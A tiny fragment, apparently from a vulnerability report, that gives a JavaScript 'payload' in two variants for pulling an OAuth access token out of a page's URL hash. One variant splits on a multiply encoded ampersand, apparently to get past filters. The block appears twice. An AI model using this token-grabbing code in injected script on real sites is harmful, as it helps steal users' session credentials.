Payload:
document.location.hash.split('access_token=')[1].split("&")[0]
or
document.location.hash.split('access_token=')[1].split("%25%32%35%25%33%32%25%33%36")[0]
漏洞报告
Payload:
document.location.hash.split('access_token=')[1].split("&")[0]
or
document.location.hash.split('access_token=')[1].split("%25%32%35%25%33%32%25%33%36")[0]
漏洞报告